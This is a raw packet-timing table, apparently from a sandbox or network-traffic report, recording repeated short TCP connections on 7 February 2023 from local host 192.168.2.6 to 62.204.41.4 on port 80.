                          Feb 7, 2023 20:01:05.660914898 CET4978180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.722512960 CET804978062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:05.722685099 CET4978080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.723190069 CET804978162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:05.723313093 CET4978180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.723793983 CET4978180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.786051035 CET804978162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:05.788511992 CET804978162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:05.788634062 CET4978180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.997456074 CET4978180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.998256922 CET4978280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.059680939 CET804978262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:06.059926987 CET804978162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:06.059943914 CET4978280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.060199022 CET4978180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.291220903 CET4978280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.352859020 CET804978262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:06.356937885 CET804978262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:06.357093096 CET4978280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.558049917 CET4978280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.558909893 CET4978380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.619646072 CET804978362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:06.619704962 CET804978262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:06.619894981 CET4978380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.620028973 CET4978280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.638993979 CET4978380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.699956894 CET804978362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:06.706861973 CET804978362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:06.706995964 CET4978380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.826986074 CET4978380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.829476118 CET4978480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.887984037 CET804978362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:06.888180017 CET4978380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.891916990 CET804978462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:06.892146111 CET4978480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.918802023 CET4978480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:06.981659889 CET804978462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:06.983558893 CET804978462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:06.983676910 CET4978480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:07.712702990 CET4978480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:07.717434883 CET4978580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:07.775568962 CET804978462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:07.775646925 CET4978480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:07.779017925 CET804978562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:07.779230118 CET4978580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:07.828926086 CET4978580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:07.890588999 CET804978562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:07.894109964 CET804978562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:07.894275904 CET4978580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:08.049109936 CET4978580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:08.049922943 CET4978680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:08.110941887 CET804978662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:08.111066103 CET804978562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:08.111196995 CET4978680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:08.111248016 CET4978580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:08.155419111 CET4978680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:08.216197014 CET804978662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:08.219896078 CET804978662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:08.220136881 CET4978680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:08.461524010 CET4978680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:08.462304115 CET4978780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:08.522628069 CET804978662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:08.522839069 CET4978680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:08.522948980 CET804978762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:08.523159027 CET4978780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:09.515244007 CET4978780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:09.576014042 CET804978762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:09.579471111 CET804978762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:09.579701900 CET4978780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:09.703887939 CET4978780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:09.704621077 CET4978880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:09.764673948 CET804978762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:09.764837027 CET4978780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:09.765018940 CET804978862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:09.765167952 CET4978880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:09.765671968 CET4978880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:09.826329947 CET804978862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:09.828516006 CET804978862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:09.828605890 CET4978880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:09.938764095 CET4978880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:09.939498901 CET4978980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:09.999558926 CET804978862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:09.999651909 CET4978880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.000060081 CET804978962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:10.000189066 CET4978980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.000648975 CET4978980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.061239958 CET804978962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:10.064567089 CET804978962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:10.064817905 CET4978980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.167711020 CET4978980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.168591976 CET4979080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.228699923 CET804978962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:10.228910923 CET4978980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.230359077 CET804979062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:10.230535030 CET4979080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.237145901 CET4979080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.298584938 CET804979062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:10.300898075 CET804979062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:10.301033974 CET4979080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.418250084 CET4979080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.420084953 CET4979180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.479995012 CET804979062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:10.480269909 CET4979080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.481415987 CET804979162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:10.481580019 CET4979180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.547143936 CET4979180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.608803034 CET804979162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:10.610843897 CET804979162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:10.611063957 CET4979180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.715131044 CET4979180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.716252089 CET4979280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.776890039 CET804979162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:10.777029991 CET4979180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.777103901 CET804979262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:10.777245045 CET4979280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.777921915 CET4979280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.838962078 CET804979262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:10.841155052 CET804979262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:10.841239929 CET4979280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.964803934 CET4979280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:10.968189001 CET4979380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.025995970 CET804979262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.026196957 CET4979280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.029710054 CET804979362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.029970884 CET4979380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.030637026 CET4979380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.092015028 CET804979362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.095829010 CET804979362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.096054077 CET4979380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.200181007 CET4979380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.201715946 CET4979480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.261917114 CET804979362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.261982918 CET804979462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.262149096 CET4979380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.262217999 CET4979480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.263709068 CET4979480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.324016094 CET804979462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.326148033 CET804979462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.326247931 CET4979480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.433110952 CET4979480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.434078932 CET4979580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.493602991 CET804979462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.493666887 CET804979562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.493881941 CET4979480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.493922949 CET4979580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.503277063 CET4979580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.563290119 CET804979562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.565735102 CET804979562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.565871954 CET4979580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.686422110 CET4979580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.687148094 CET4979680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.746486902 CET804979562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.746656895 CET4979580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.750360012 CET804979662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.750653982 CET4979680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.751019001 CET4979680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.814613104 CET804979662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.815969944 CET804979662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:11.816134930 CET4979680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.936992884 CET4979680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.937700987 CET4979780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:11.999978065 CET804979762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.000087976 CET4979780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.000477076 CET4979780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.000510931 CET804979662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.000577927 CET4979680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.061995983 CET804979762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.065249920 CET804979762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.065448046 CET4979780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.168286085 CET4979780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.169500113 CET4979880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.231165886 CET804979762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.231420994 CET4979780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.232146978 CET804979862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.232304096 CET4979880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.233155012 CET4979880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.295963049 CET804979862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.297056913 CET804979862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.297278881 CET4979880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.402540922 CET4979880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.403362989 CET4979980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.465389013 CET804979862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.465575933 CET4979880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.466556072 CET804979962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.466705084 CET4979980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.467160940 CET4979980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.529489994 CET804979962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.532263994 CET804979962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.532388926 CET4979980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.636703968 CET4979980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.638536930 CET4980080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.700263023 CET804979962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.700428009 CET4979980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.700558901 CET804980062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.700670958 CET4980080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.702989101 CET4980080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.764086962 CET804980062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.766032934 CET804980062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.766160965 CET4980080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.871026039 CET4980080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.871741056 CET4980180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.931669950 CET804980062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.931864977 CET4980080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.931976080 CET804980162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.932101011 CET4980180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.934086084 CET4980180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:12.994571924 CET804980162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.996850014 CET804980162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:12.997059107 CET4980180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.108071089 CET4980180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.108855009 CET4980280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.169074059 CET804980162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.169202089 CET4980180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.170164108 CET804980262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.170275927 CET4980280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.174021006 CET4980280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.235879898 CET804980262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.239062071 CET804980262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.239233017 CET4980280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.362588882 CET4980280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.363290071 CET4980380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.424078941 CET804980362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.424127102 CET804980262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.424274921 CET4980380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.424335003 CET4980280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.424989939 CET4980380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.485548019 CET804980362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.487775087 CET804980362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.487891912 CET4980380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.610404015 CET4980380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.611145020 CET4980480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.671416998 CET804980362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.671540976 CET4980380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.671813965 CET804980462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.671911955 CET4980480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.672357082 CET4980480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.733074903 CET804980462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.735300064 CET804980462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.735426903 CET4980480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.857316971 CET4980480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.858016968 CET4980580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.917246103 CET804980562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.917479038 CET4980580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.918034077 CET804980462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.918183088 CET4980580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.918287992 CET4980480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:13.977479935 CET804980562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.980031013 CET804980562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:13.984534025 CET4980580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.090332031 CET4980580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.091207981 CET4980680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.150021076 CET804980562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.153398991 CET4980580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.153786898 CET804980662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.154002905 CET4980680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.154494047 CET4980680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.217113972 CET804980662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.220354080 CET804980662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.221419096 CET4980680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.339504957 CET4980680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.340234041 CET4980780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.402328014 CET804980662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.402414083 CET804980762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.402535915 CET4980680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.402609110 CET4980780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.403500080 CET4980780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.466530085 CET804980762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.468887091 CET804980762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.469122887 CET4980780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.574259996 CET4980780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.575150013 CET4980880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.636082888 CET804980862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.637062073 CET804980762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.637300968 CET4980780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.637798071 CET4980880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.637798071 CET4980880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.698618889 CET804980862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.701153040 CET804980862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.702510118 CET4980880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.811765909 CET4980880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.812757015 CET4980980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.872651100 CET804980862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.872931957 CET804980962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.873070002 CET4980880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.873136997 CET4980980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.874634027 CET4980980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:14.934932947 CET804980962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.937292099 CET804980962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:14.937524080 CET4980980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.043287039 CET4980980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.044121981 CET4981080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.103759050 CET804980962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.103971958 CET4980980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.106724024 CET804981062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.106906891 CET4981080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.107347012 CET4981080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.169776917 CET804981062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.174127102 CET804981062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.174343109 CET4981080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.280302048 CET4981080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.281080008 CET4981180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.341578960 CET804981162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.341805935 CET4981180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.342261076 CET4981180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.344029903 CET804981062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.344162941 CET4981080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.402879953 CET804981162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.405101061 CET804981162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.405239105 CET4981180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.512597084 CET4981180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.513485909 CET4981280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.572832108 CET804981262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.573008060 CET804981162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.573082924 CET4981280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.573100090 CET4981180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.578134060 CET4981280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.637778997 CET804981262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.639976978 CET804981262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.640172958 CET4981280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.752191067 CET4981280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.753077030 CET4981480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.811878920 CET804981262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.812135935 CET4981280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.812484026 CET804981462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.812634945 CET4981480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.831909895 CET4981480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:15.891576052 CET804981462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.893851995 CET804981462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:15.893943071 CET4981480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.013864994 CET4981480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.014611959 CET4981580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.073625088 CET804981462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.073771954 CET4981480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.076206923 CET804981562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.076400042 CET4981580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.077954054 CET4981580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.139558077 CET804981562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.143034935 CET804981562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.143237114 CET4981580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.265810966 CET4981580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.266654968 CET4981680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.326462984 CET804981662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.326603889 CET4981680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.327498913 CET804981562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.327609062 CET4981580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.328216076 CET4981680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.387864113 CET804981662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.390471935 CET804981662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.390588045 CET4981680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.498101950 CET4981680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.499257088 CET4981780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.558053017 CET804981662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.558171988 CET4981680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.561960936 CET804981762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.562086105 CET4981780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.563417912 CET4981780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.626102924 CET804981762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.628117085 CET804981762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.628232002 CET4981780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.746359110 CET4981780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.747256994 CET4981880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.809052944 CET804981862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.809098959 CET804981762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:16.809261084 CET4981880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:16.809334993 CET4981780192.168.2.662.204.41.4
